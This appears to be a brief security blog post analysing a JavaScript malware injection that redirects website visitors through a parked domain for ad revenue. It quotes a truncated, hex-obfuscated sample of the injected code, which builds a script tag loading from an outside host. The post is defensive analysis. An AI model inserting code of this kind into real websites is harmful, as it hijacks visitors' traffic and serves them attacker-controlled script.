Malicious Injection Redirects Traffic via Parked Domain

During a recent investigation, our malware remediation team encountered a variant of a common malware injection that has been active since at least 2017. The malware was found hijacking the website’s traffic, redirecting visitors via a parked third-party domain to generate ad revenue.

Investigating obfuscated JavaScript

Our investigation revealed the following piece of obfuscated JavaScript which was found injected into random legitimate JavaScript files in the environment.

In most cases, the injection typically looks something like this:

var div_avada=document.createElement('script');div_avada.setAttribute("type","text/javascript");var all_avada=["\x2F\x2F\x68\x74\x6D\x6C\x35\x2E\x6F\x6E\x6C\x2F\x6E\x61\x76\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var …

black hat tactics domain hacked websites hijacking injection investigation javascript labs note malicious malware obfuscated party piece redirects remediation revenue team third third-party traffic website website malware infections website security wordpress security